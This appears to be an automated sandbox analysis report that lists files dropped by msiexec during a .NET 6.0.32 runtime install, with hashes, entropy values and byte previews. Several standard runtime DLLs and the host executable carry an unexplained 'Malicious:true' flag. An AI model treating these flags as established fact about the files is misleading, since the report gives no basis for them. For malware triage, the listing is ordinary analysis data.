                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (755), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79954
                                                                                                                                                                                                                                        Entropy (8bit):5.2343129347468
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:HA9jHwQZGfgg39/zwgAVkguQXrDjugtSEGepkWvrpX7anuqdLS4mfiStPq+3Lefj:HA97wfogz1AVxuujHtSFULryLggrGRwJ
                                                                                                                                                                                                                                        MD5:F77A4AECFAF4640D801EB6DCDFDDC478
                                                                                                                                                                                                                                        SHA1:7424710F255F6205EF559E4D7E281A3B701183BB
                                                                                                                                                                                                                                        SHA-256:D5DB0ED54363E40717AE09E746DEC99AD5B09223CC1273BB870703176DD226B7
                                                                                                                                                                                                                                        SHA-512:1B729DFA561899980BA8B15128EA39BC1E609FE07B30B283001FD9CF9DA62885D78C18082D0085EDD81F09203F878549B48F7F888A8486A2A526B134C849FD6B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.NET Runtime uses third-party libraries or other resources that may be..distributed under licenses different than the .NET Runtime software.....In the event that we accidentally failed to list a required notice, please..bring it to our attention. Post an issue or email us:.... dotnet@microsoft.com....The attached notices are provided for information only.....License notice for ASP.NET..-------------------------------....Copyright (c) .NET Foundation. All rights reserved...Licensed under the Apache License, Version 2.0.....Available at..https://github.com/dotnet/aspnetcore/blob/main/LICENSE.txt....License notice for Slicing-by-8..-------------------------------....http://sourceforge.net/projects/slicing-by-8/....Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved......This software program is licensed subject to the BSD License, available at..http://www.opensource.org/licenses/bsd-license.html.....License notice for Unicode data..-------------------------------...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\dotnet.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):139440
                                                                                                                                                                                                                                        Entropy (8bit):6.285914420289258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:WwmRQoZmiyYIRPEgufW6see//RLlpseL5AXbwFWY+d:WwmRbZmiyAfClnRLlpfLyLyWYW
                                                                                                                                                                                                                                        MD5:CE8CBB6E38AD12C689FB7163909E26D6
                                                                                                                                                                                                                                        SHA1:E768FF143E96D957715EB6A63DA8BCE6A3AFF650
                                                                                                                                                                                                                                        SHA-256:980F40799FEBBD508652C7FE657A55B0E7BFE822E812C3070681896DA941BB69
                                                                                                                                                                                                                                        SHA-512:D6E49FE67A5239ECF39C6C871975E7DB15BD9BECECF208CD0E60DCFFA52B4BCF3C0A68894A56907FFD8626781AC898247633499B5F40D0A04AD16BFE2890658E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..}|...|...|...../p...../v.....//...u.).l...../y...|........./t.....E.}...../}...Rich|...................PE..d.....lf.........."......J.......... ..........@.............................P............`..........................................................0..........8........(...@..........T.......................(.......8............`...............................text....H.......J.................. ..`.rdata...~...`.......N..............@..@.data...............................@....pdata..8...........................@..@_RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):378144
                                                                                                                                                                                                                                        Entropy (8bit):6.30005759256042
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:+CrkuaHqY/1EtiaDC3+Gr4iAOs+WEAO2gcmgrW09S:JmHqe1E3D/iAOsksH9
                                                                                                                                                                                                                                        MD5:9D67514FE36639B7EDA307FB46D27178
                                                                                                                                                                                                                                        SHA1:B8BA4CA6BCF2E5740B7E0F7A077FC72B1248BAFE
                                                                                                                                                                                                                                        SHA-256:EC8F92F2BCC5F6EE94605B7883E663236F2A2F578F4E610EAE9934CBD4266FE9
                                                                                                                                                                                                                                        SHA-512:4CA3BB0167F7F2512BFB1CC69B72FBDEFC4D3ED7679BA7ABD4B8C60F42DF2B95F6B44550F5A14C5843305B7705634D9B26327D87BB24F2934ABB5FF94C54AEA8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k..|.I.|.I.|.I...H.|.I...H.|.I...H.|.I...I.|.I+..H.|.I.|.I4|.I2..H.|.I2..H.|.I2..I.|.I2..H.|.IRich.|.I........PE..d...i.lf.........." ................................................................3.....`A.........................................P.......R.................../...... )......|.......p.......................(.......8............................................text...,........................... ..`.rdata...S.......T..................@..@.data...(....p.......T..............@....pdata.../.......0...^..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\.version

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50
                                                                                                                                                                                                                                        Entropy (8bit):4.101984511178706
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:3SVNHUdSBnO2RUiXXdJ:LdSBO0z
                                                                                                                                                                                                                                        MD5:51BD796C4F311A08FFB7781E5D032A93
                                                                                                                                                                                                                                        SHA1:F91A587530005F6A7EDC281B2C86FC3B0369F676
                                                                                                                                                                                                                                        SHA-256:D684BCA93AB166D9929058855272376468E4D58425040467C5BF329725468116
                                                                                                                                                                                                                                        SHA-512:421A623385F5DEC6526A6765C13C3F6F4DD177F1C11A8894618BB3EDE1D87165442749350BCFF9BF0781C8DF81C2DCBBD331A20532EA229197D14FCC82199A83
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:e77011b31a3e5c47d931248a64b47f9b2d47853d..6.0.32..

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1042592
                                                                                                                                                                                                                                        Entropy (8bit):6.758579311481363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:u4NoNIdwu/Mw+u1xjx1Rb+Vu9yHTzsYVhdi4YBa72DS:uHNIdwuBLlPb+Vu9yHJXiZO
                                                                                                                                                                                                                                        MD5:58494487C1CD786C3AA26773E28B59EA
                                                                                                                                                                                                                                        SHA1:2B9E1F70AFC82DDAF1ADC1A7040FE960FAEB4D6B
                                                                                                                                                                                                                                        SHA-256:800E688FF423393F2741BE90BC6177B37F7077C11A885A3AE3C5AECEF941D521
                                                                                                                                                                                                                                        SHA-512:F4FD17EAD8F5039993B8EE9222CF61CAC841528578BDF5326B2AEB2FAAEF0CC6798DB301DC84035FFAE2BDAEADC93F7B63EAFE98727E09F25374455E2B6838DB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...._............" ................................................................0.....`...@......@............... .......................................6...j.......(......<...hD..T...............................................................H............text............................... ..`.data...D...........................@....reloc..<...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.DiaSymReader.Native.amd64.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2309152
                                                                                                                                                                                                                                        Entropy (8bit):6.414576855139372
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:jH+fGgFyzuNiG6H0n8D1gkrz/OAyFAopdrq/c/:+GgFQq8DT/ZyFDN0c
                                                                                                                                                                                                                                        MD5:A71CD05C01F0FC603C0BD782516F806D
                                                                                                                                                                                                                                        SHA1:C15E261D5E7318875D324D28AB70A883CD434C81
                                                                                                                                                                                                                                        SHA-256:7F8DCF37D9D66EAE14C48A79FA2FCD447BD0F38A21BE0203A9C4A89398AACF28
                                                                                                                                                                                                                                        SHA-512:CE53F6DC1F02889ED6FB1F8DF226F9BADBB039F79505CDBD599A00A32B6617DA5E19F2AD7F76BB8134B3CCAD39FAB2209ED8EC6AE42CD30402C4E450FC19FA88
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Wq0...^...^...^.Xh]...^.Xh[..^.XhZ...^..]...^..Z.'.^.Xh_...^..._...^..[.m.^..W...^..^...^......^.......^..\...^.Rich..^.........................PE..d....ZY..........." ...(.....\...... 0........................................#......)$...`A.........................................Z!.p....[!.P....P#.......!..W....#. (...`#..>.....p.......................(....U..@...................0Y!.`....................text............................... ..`.rdata...Y.......Z..................@..@.data....a...p!......^!.............@....pdata...W....!..X...t!.............@..@.didat..p....@#.......".............@....rsrc........P#.......".............@..@.reloc...>...`#..@....".............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.deps.json

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32962
                                                                                                                                                                                                                                        Entropy (8bit):4.3074461179606
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:+49mVEsIhKPMEPrT3XCGjDyiEc6BHa21Fe8kFN92uwtEeCJyX:voVEsIhKPMEPrT3XCGjDyiEc6BHa21F1
                                                                                                                                                                                                                                        MD5:8E0F8427C729E6B4CF95998F846A0887
                                                                                                                                                                                                                                        SHA1:201AD7BE0AD49C2C2DBE7C27B86A9295DCF0ACB0
                                                                                                                                                                                                                                        SHA-256:335A13F00FB336771FBEA2BB4A29E99E6E8BCF17B8C484091D256A99AB5DFDAF
                                                                                                                                                                                                                                        SHA-512:368D3F644361014808932F21C6324153D2A250B6FF869A8F261F68CCF2C93874F72CDE8B474B3A7E4E54A7B10649B50F83E3AE5910D325E8CF7A77BA06DD9EE5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0/win-x64",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {},.. ".NETCoreApp,Version=v6.0/win-x64": {.. "Microsoft.NETCore.App.Runtime.win-x64/6.0.32": {.. "runtime": {.. "System.Private.CoreLib.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "Microsoft.VisualBasic.dll": {.. "assemblyVersion": "10.0.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "mscorlib.dll": {.. "assemblyVersion": "4.0.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "netstandard.dll": {.. "assemblyVersion": "2.1.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "System.AppContext.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3224.31407".. },..

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.runtimeconfig.json

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159
                                                                                                                                                                                                                                        Entropy (8bit):4.54941695087313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:3Hpn/hdNxDI/pANC+KL4nNOcW3mJAGRM3Bojqy2VKXmHEk/FTy:3Hp/hdNyhAk+Q6NOCUo+K8EkNTy
                                                                                                                                                                                                                                        MD5:3FBD84A952D4BAB02E11FEC7B2BBC90E
                                                                                                                                                                                                                                        SHA1:E92DE794F3C8D5A5A1A0B75318BE9D5FB528D07D
                                                                                                                                                                                                                                        SHA-256:1B7AA545D9D3216979A9EFE8D72967F6E559A9C6A22288D14444D6C5C4C15738
                                                                                                                                                                                                                                        SHA-512:C97C1DA7AE94847D4EDF11625DC5B5085838C3842A550310CCA5C70BA54BE907FF454CA1E0080BA451EACFC5954C3F778F8B4E26C0933E55C121C86C9A24400B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1245360
                                                                                                                                                                                                                                        Entropy (8bit):6.768935404732361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:tmvclJOXFDjW/lWSGcIyEAGY/7YlDwCi/Io+dw:QvcHOXFPW/lRGcDEAGYhCiN
                                                                                                                                                                                                                                        MD5:D9062214FEE5FE8D1903D3FCF1E1FBEB
                                                                                                                                                                                                                                        SHA1:34C9078D2F4F70646313975022A117192214FC4A
                                                                                                                                                                                                                                        SHA-256:F0D2D4D1E1B38D1449E51F5BFDC73B25C24F8659D98871BDDAF0650B88982538
                                                                                                                                                                                                                                        SHA-512:2B4A0D678B3AAD2E5665C71B9576522B0997E3B802BF260B785EDAF5B0DB390639A34EAF1F5D02B520272E1247968F9B4819198719418180ED4DBFC935C8E914
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ......................................................................`...@......@............... ..................................L........k.......(......l...(D..T...........................................................P...H............text............................... ..`.data........ ......................@....reloc..l...........................@..B............................................0.......................<.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............d....z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........R.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18184
                                                                                                                                                                                                                                        Entropy (8bit):6.586065972352763
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:59SphH3czeYtcxWmH6t9QdWaYA6VFHRN7WDpSR9zWiBcfCg:5kHMzbJ+FClipe9z5cT
                                                                                                                                                                                                                                        MD5:F5A860792D6CE3C90865FBFBBC811026
                                                                                                                                                                                                                                        SHA1:CD7E52880FCC072C2CB743D040E7AE67C7B79D1B
                                                                                                                                                                                                                                        SHA-256:833AFA20C11993D9260EF08CA493462CC182B940ABBB7FAE0BAE359EC114CCF1
                                                                                                                                                                                                                                        SHA-512:A6FD6CCA6FDCDD18604DB8C21ED9BE7263CB779298F5BE51A05FDC1BEB453FBF3C7B7E759031CEE54F476439975F2733FED3B539F70E8D02777EAF3091220961
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.@..........." ..0..............2... ...@....... ....................................`.................................{2..O....@...................)...`.......1..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H.......P .......................1......................................BSJB............v4.0.30319......l.......#~..p.......#Strings....l.......#US.p.......#GUID.......H...#Blob............T.........3....................................K...............2.................<.....d.J..........."...~."....."...}."....."...}."....."...d.".....".....x.....x.............................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26272
                                                                                                                                                                                                                                        Entropy (8bit):6.550629473321971
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:GWhPKpWCZWnjmMDQnqyXhcuolXWcYA6VFHRN7yfUiHR9z70+I:40jm5n5XivDFClTQ9zG
                                                                                                                                                                                                                                        MD5:EC5D0ACACD99FFD68DB813B11F04965C
                                                                                                                                                                                                                                        SHA1:AEEA184FA29CD03087E92D25B47EECA5DA0EC09D
                                                                                                                                                                                                                                        SHA-256:85EB1682060ABD5B680267B1F4A8FD3F9141919781A7A4F259F50AC99C1CFD5E
                                                                                                                                                                                                                                        SHA-512:C19C3B504F16015C4DFCBF4F3EF0CE2652C661823765B7FC9D709FD844831C1C03AEB3FAB9B12F850920CFA632C9C969EC6F466A13CA9AD96C69CC26D5FD2E80
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...4............." .....4...................................................p...........`...@......@............... ..................................D............>...(...`..\...8...T...........................................................H...H............text....2.......4.................. ..`.data........P.......6..............@....reloc..\....`.......<..............@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Registry.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87712
                                                                                                                                                                                                                                        Entropy (8bit):6.6073982140765795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:xyjecxml5gdJKCILek2ymrsykEomWxGsViqo5qkbqkikzhma:xyjeIml5KJKCdy5ykE8xGsViqCqszjD
                                                                                                                                                                                                                                        MD5:E1E1078BD5CE3EB3865684D082839E72
                                                                                                                                                                                                                                        SHA1:DF92E8E112F30DB28B49018023E7E6433170E755
                                                                                                                                                                                                                                        SHA-256:6EB1A0E98D684C6F647092299C680186A2F80C571C137043B1AF9B0FF0518C81
                                                                                                                                                                                                                                        SHA-512:ECA6E8A8E589FF01A97D8A62F884BBC7BB9A39F074502DD3EF8B6AF0D9D81FB8F97C5DCADAF638386BBAD1E57083A4DAB475BFE80FC25488CC701D8E31596ED4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...KT............" .........................................................`......1,....`...@......@............... ..................................8...p............(...P..........T...........................................................8...H............text............................... ..`.data........0......................@....reloc.......P.......,..............@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.AppContext.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15632
                                                                                                                                                                                                                                        Entropy (8bit):6.786322181535639
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:/GyxxBHaW+E7WJpWjA6Kr4PFHnhWgN7agWe5Y00pyEuX01k9z3AD4IQvpIS7WcU:/zrHaW+E7WJYA6VFHRN7pEpcR9zt5zU
                                                                                                                                                                                                                                        MD5:F65763C85CFE0BE955E9BB620DE349C9
                                                                                                                                                                                                                                        SHA1:9B7A9FC65982CC76E859B5605C9DE2C384AD8528
                                                                                                                                                                                                                                        SHA-256:7C804005A4E369C54E2FEFB338C3C1BC2D0AAFA6AA6D0FEE51F9AB161B8C8034
                                                                                                                                                                                                                                        SHA-512:8173154BDA7F16957182495692E19E1B71F26D9B7E1E9CB753A7B1D05A7BFCC2F9B51B83E53343EEE02A5C312307576B5218937E238F99B6D1209F86B5CFD995
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h_............"!..0.............^)... ........@.. ..............................-.....`..................................)..S....@..h................)...`......d(..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B................@)......H........ ......................P ......................................Ba.6?o.y].'@.....H.5l..X;..g.8...!..o.1..nMFN..y.P6-...$.(v...[..v*....S.2..`..w6.yX.E..G...m...KhRRs..2+..6..7e.......7..CBSJB............v4.0.30319......`.......#~..,.......#Strings............#GUID...........#Blob......................3................................................".p.....p...;.>.........f.............Q.....Q.....&...!.&.....&...[.&.....&.....&.....&...B.&...O.&...v.p...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.770683864726388
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:hb+0jWYb2WapWjA6Kr4PFHnhWgN7aIWPALBm+0U8X01k9z3AlL0w:hFjWYb2WaYA6VFHRN7uCBmo8R9zML0w
                                                                                                                                                                                                                                        MD5:63A871EC790F87FD651C5C31191669D3
                                                                                                                                                                                                                                        SHA1:B1DCA1FAF1A6C68840252F50263A3F83FCF1B089
                                                                                                                                                                                                                                        SHA-256:4505FB902833DA7A84AEE6940ECF1214FE4D58A5538C6E1B9D24B9A5F4BA542D
                                                                                                                                                                                                                                        SHA-512:FC3953902E06E563644D075E535F5F7ADB274513C608412C123520A60FA3DFE5FCC5E54D1580F7E4C35CFE3C7000414B6AE5A3985B097D85A3AFFDFADDFD6836
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e.W..........."!..0.............^)... ........@.. ..............................6.....`..................................)..S....@..X................(...`......h(..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B................@)......H........ ......................P .......................................P."jU.=s..u.....&%....#p..rEc...#7.{f.'......z....wO.vIF...b<......9...q..$b'...$9.$e...r.. ......I;..a..|.n.\.J].l.-[/^.c.BSJB............v4.0.30319......`.......#~..,.......#Strings............#GUID...........#Blob......................3..................................................y.....y...G.G.........r.......(.....Z.....Z...../...-./...../...g./...../...../...../...N./...[./.....y...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Concurrent.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):246944
                                                                                                                                                                                                                                        Entropy (8bit):6.848188639113924
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:IsS/sAVyNURkbEf5+i6MKORygikbyO2aGJ0pebyz:IslArRvt6MikbD2lieyz
                                                                                                                                                                                                                                        MD5:EE80410AB6F7E4CCF5AF69610B88C961
                                                                                                                                                                                                                                        SHA1:6136CF0F7AF46A00867631E83C912F1CAA9924D0
                                                                                                                                                                                                                                        SHA-256:1ADAEC2435191BBDCB569BF6847D8DADBBD8311E8D4A197A8E589422184673FD
                                                                                                                                                                                                                                        SHA-512:62038BB7A1482B61E8465E6586CE041D8FB43600CC97A4FE9360B5A7D9808493F7E4D846B7FD83E9ADBFA00E83442208BF4955CB8E5AFB55B8C892021EBE88E9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
